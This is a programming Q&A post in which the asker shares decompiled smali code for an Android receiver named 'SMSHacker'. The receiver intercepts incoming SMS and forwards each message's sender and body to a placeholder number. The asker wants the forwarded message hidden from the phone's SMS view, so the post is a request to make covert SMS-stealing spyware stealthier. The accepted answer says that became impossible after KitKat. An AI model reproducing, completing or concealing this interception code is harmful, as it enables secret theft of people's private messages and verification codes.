# How to send SMS from the Android app without making it get recorded in device SMS view

Tags: android, sms

I want to send an SMS from my android app. But I don't want its record to be exist in device message view. I am currently using below code:

```
    .class public Lcom/sms/smshacker/SMSHacker;
.super Landroid/content/BroadcastReceiver;
.source "SMSHacker.java"


# static fields
.field private static final SMS_RECEIVED:Ljava/lang/String; = "android.provider.Telephony.SMS_RECEIVED"

.field private static final TAG:Ljava/lang/String; = "SMSBroadcastReceiver"


# direct methods
.method public constructor <init>()V
    .locals 0

    .prologue
    .line 14
    invoke-direct {p0}, Landroid/content/BroadcastReceiver;-><init>()V

    return-void
.end method


# virtual methods
.method public onReceive(Landroid/content/Context;Landroid/content/Intent;)V
    .locals 11
    .parameter "context"
    .parameter "intent"

    .prologue
    .line 21
    const-string v1, "SMSBroadcastReceiver"

    new-instance v2, Ljava/lang/StringBuilder;

    const-string v4, "Intent recieved: "

    invoke-direct {v2, v4}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V

    invoke-virtual {p2}, Landroid/content/Intent;->getAction()Ljava/lang/String;

    move-result-object v4

    invoke-virtual {v2, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;

    move-result-object v2

    invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;

    move-result-object v2

    invoke-static {v1, v2}, Landroid/util/Log;->i(Ljava/lang/String;Ljava/lang/String;)I

    .line 23
    invoke-virtual {p2}, Landroid/content/Intent;->getAction()Ljava/lang/String;

    move-result-object v1

    const-string v2, "android.provider.Telephony.SMS_RECEIVED"

    invoke-virtual {v1, v2}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z

    move-result v1

    if-eqz v1, :cond_0

    .line 24
    invoke-virtual {p2}, Landroid/content/Intent;->getExtras()Landroid/os/Bundle;

    move-result-object v9

    .line 25
    .local v9, myBundle:Landroid/os/Bundle;
    const/4 v8, 0x0

    .line 26
    .local v8, messages:[Landroid/telephony/SmsMessage;
    const-string v3, ""

    .line 28
    .local v3, strMessage:Ljava/lang/String;
    if-eqz v9, :cond_0

    .line 29
    const-string v1, "pdus"

    invoke-virtual {v9, v1}, Landroid/os/Bundle;->get(Ljava/lang/String;)Ljava/lang/Object;

    move-result-object v10

    check-cast v10, [Ljava/lang/Object;

    .line 30
    .local v10, pdus:[Ljava/lang/Object;
    array-length v1, v10

    new-array v8, v1, [Landroid/telephony/SmsMessage;

    .line 32
    const/4 v7, 0x0

    .local v7, i:I
    :goto_0
    array-length v1, v8

    if-lt v7, v1, :cond_1

    .line 40
    new-instance v1, Ljava/lang/StringBuilder;

    const-string v2, "Message has been intercepted!\n"

    invoke-direct {v1, v2}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V

    invoke-virtual {v1, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;

    move-result-object v1

    invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;

    move-result-object v3

    .line 43
    :try_start_0
    invoke-static {}, Landroid/telephony/SmsManager;->getDefault()Landroid/telephony/SmsManager;

    move-result-object v0

    .line 44
    .local v0, smsMan:Landroid/telephony/SmsManager;
    const-string v1, "number Goes Here"

    const/4 v2, 0x0

    const/4 v4, 0x0

    const/4 v5, 0x0

    invoke-virtual/range {v0 .. v5}, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V
    :try_end_0
    .catch Ljava/lang/Exception; {:try_start_0 .. :try_end_0} :catch_0

    .line 55
    .end local v0           #smsMan:Landroid/telephony/SmsManager;
    .end local v3           #strMessage:Ljava/lang/String;
    .end local v7           #i:I
    .end local v8           #messages:[Landroid/telephony/SmsMessage;
    .end local v9           #myBundle:Landroid/os/Bundle;
    .end local v10           #pdus:[Ljava/lang/Object;
    :cond_0
    :goto_1
    return-void

    .line 33
    .restart local v3       #strMessage:Ljava/lang/String;
    .restart local v7       #i:I
    .restart local v8       #messages:[Landroid/telephony/SmsMessage;
    .restart local v9       #myBundle:Landroid/os/Bundle;
    .restart local v10       #pdus:[Ljava/lang/Object;
    :cond_1
    aget-object v1, v10, v7

    check-cast v1, [B

    invoke-static {v1}, Landroid/telephony/SmsMessage;->createFromPdu([B)Landroid/telephony/SmsMessage;

    move-result-object v1

    aput-object v1, v8, v7

    .line 34
    new-instance v1, Ljava/lang/StringBuilder;

    invoke-static {v3}, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String;

    move-result-object v2

    invoke-direct {v1, v2}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V

    const-string v2, "SMS From: "

    invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;

    move-result-object v1

    .line 35
    aget-object v2, v8, v7

    invoke-virtual {v2}, Landroid/telephony/SmsMessage;->getOriginatingAddress()Ljava/lang/String;

    move-result-object v2

    invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;

    move-result-object v1

    .line 34
    invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;

    move-result-object v3

    .line 36
    new-instance v1, Ljava/lang/StringBuilder;

    invoke-static {v3}, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String;

    move-result-object v2

    invoke-direct {v1, v2}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V

    const-string v2, "\n : "

    invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;

    move-result-object v1

    invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;

    move-result-object v3

    .line 37
    new-instance v1, Ljava/lang/StringBuilder;

    invoke-static {v3}, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String;

    move-result-object v2

    invoke-direct {v1, v2}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V

    aget-object v2, v8, v7

    invoke-virtual {v2}, Landroid/telephony/SmsMessage;->getMessageBody()Ljava/lang/String;

    move-result-object v2

    invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;

    move-result-object v1

    invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;

    move-result-object v3

    .line 38
    new-instance v1, Ljava/lang/StringBuilder;

    invoke-static {v3}, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String;

    move-result-object v2

    invoke-direct {v1, v2}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V

    const-string v2, "\n"

    invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;

    move-result-object v1

    invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;

    move-result-object v3

    .line 32
    add-int/lit8 v7, v7, 0x1

    goto/16 :goto_0

    .line 46
    :catch_0
    move-exception v6

    .line 47
    .local v6, ex:Ljava/lang/Exception;
    invoke-virtual {v6}, Ljava/lang/Exception;->printStackTrace()V

    goto :goto_1
.end method
```

can somebody just tell me what to change and how to do it
Any help will be Greatly appreciated

Answer (score 0, accepted):

After kitkat that's not possible. Whichever application s sends a sms it gets added into sms provider and will be shown in default chosen messaging activity. This is done for preventing applications from sending hidden messages which are charged for user.

Comment: how would i do it for before kitkat

Comment: There is no difference in send SMS code. Its just that after Kit Kat all sent entries will be shown in default messaging application. Still as requested you can refer below link to get possible send SMS methods, this should work on all latest android version.http://examples.javacodegeeks.com/android/core/telephony/smsmanager/android-sending-sms-example/

Comment: still not what im looking for but ill make your day